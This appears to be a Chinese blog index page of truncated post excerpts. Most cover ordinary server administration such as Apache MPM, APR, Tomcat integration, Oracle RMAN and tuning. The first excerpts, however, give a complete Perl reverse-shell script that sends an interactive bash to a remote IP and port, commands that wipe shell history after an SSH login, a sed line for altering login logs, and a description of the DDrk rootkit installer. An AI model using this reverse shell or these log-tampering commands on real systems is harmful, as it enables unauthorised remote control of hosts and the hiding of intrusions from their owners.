将下面的代码保存为shell.pl 1#!/usr/bin/perl -w 2 3use strict; 4use Socket; 5use IO::Handle; 6 7if($#ARGV+1 != 2){ 8print "$#ARGV $0 Remote_IP Remote_Port n"; 9exit 1; 10} 11 12my $remote_ip = $ARGV[0]; 13my $remote_port = $ARGV[1]; 14 15my $proto = getprotobyname("tcp"); 16my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip)); 17 18my $shell = '/bin/bash -i'; 19 20socket(SOCK, AF_INET, SOCK_STREAM, $proto); 21 22STDOUT->autoflush(1); 23SOCK->autoflush(1); 24 25connect(SOCK,$pack_addr) or die "can not connect:$!"; 26 27open STDIN, "<&SOCK"; 28open STDOUT, ">&SOCK"; 29open STDERR, ">&SOCK"; 30 31print "Enjoy the shell.n"; 32 33system($shell); 34close SOCK; 35 36exit 0; 上个效果图先: perlshell 用法:执行./shell.pl Remote_IP Remote_Port,在远程……
Continue reading
<strong>1. 登录ssh之后不记录history</strong><br /> unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG export HISTFILE=/dev/null export HISTSIZE=0 export HISTFILESIZE=0 DDrk中就用到了一面的一条:<br /> unset HISTFILE;unset HISTSIZE;unset HISTORY;unset HISTSAVE;unset HISTFILESIZE <strong>2. sed增加登陆信息</strong><br /> 替换登录日志 sed -s ‘s/202.101.172.35/……
Continue reading
DDrk是一个名气比较大的rootkit,下面是setup安装程序的脚本,而像里面用的netstat、tty、ttymon 等程序是直接编译好的,所以我也无法查看其源代码。不过也大多是对正常的文件源码的基础上进行修改以达到隐藏文件和进程的目的。虽然该脚本上大多有英文注释,我在原基础……
Continue reading
<span><strong>1</strong></span><span style="font-family:宋体;"><strong>、</strong></span><span><strong>chattr </strong></span><span style="font-family:宋体;……
Continue reading
nocatalog方式就是用control file作为catalog,每一次备份都要往控制文件里面写好多备份信息,控制文件里面会有越来越多的备份信息。若为catalog则必须要首先要创建目录备份数据库,建立恢复目录。 catlog建立恢复目录的例子: 1.创建Catalog所需要的表……
Continue reading
首先我们先介绍一下为什么要让 Apache 与 Tomcat 之间进行连接。事实上 Tomcat 本身已经提供了 HTTP 服务,该服务默认的端口是 8080,装好 tomcat 后通过 8080 端口可以直接使用 Tomcat 所运行的应用程序,你也可以将该端口改为 80。 既然 Tomcat 本身已经可以提供这样的服务,我们为什么还要引入 Apache 或者其他的一些专门的 HTTP 服务器呢?原因有下面几……
Continue reading
一、MPM模块简介 多路处理模块,Multi-Processing Modules,MPM。负责绑定本机网络端口、接受请求,并调度子进程来处理请求。 二、MPM模块的类型 prefork 一个非线程型的、预派生的MPM worker 线程型的MPM,实现了一个混合的多线程多处理MPM,允许一个子进程中包含多个线程。……
Continue reading
<strong>一、apache2.4.1的更新背景和</strong><strong>新特点</strong> 做为最流行的WEB服务器,本次发布的2.4版本中,从另一款以计算能力著称的Web服务器NGINX中汲取了不少东西,增加……
Continue reading
APR(Apache portable Run-time libraries,Apache可移植运行库)的目的如其名称一样,主要为上层的应用程序提供一个可以跨越多操作系统平台使用的底层支持接口库。在早期 的Apache版本中,应用程序本身必须能够处理各种具体操作系统平台的细节,并针对不同的平台调用不同的处理函数。 随着Apache的进……
Continue reading
<span style="font-size:12px;"> </span> <b><span style="font-family:宋体;">一、操作系统调优<span> </span></span></b> 对于操作系统优化来说,是尽可能的增大可使用的内存容量、提高CPU的频率,保证文件系统的读写速率等。经过压力测试验证,在并发连接很多的情况下,CPU的处理能力越强……
Continue reading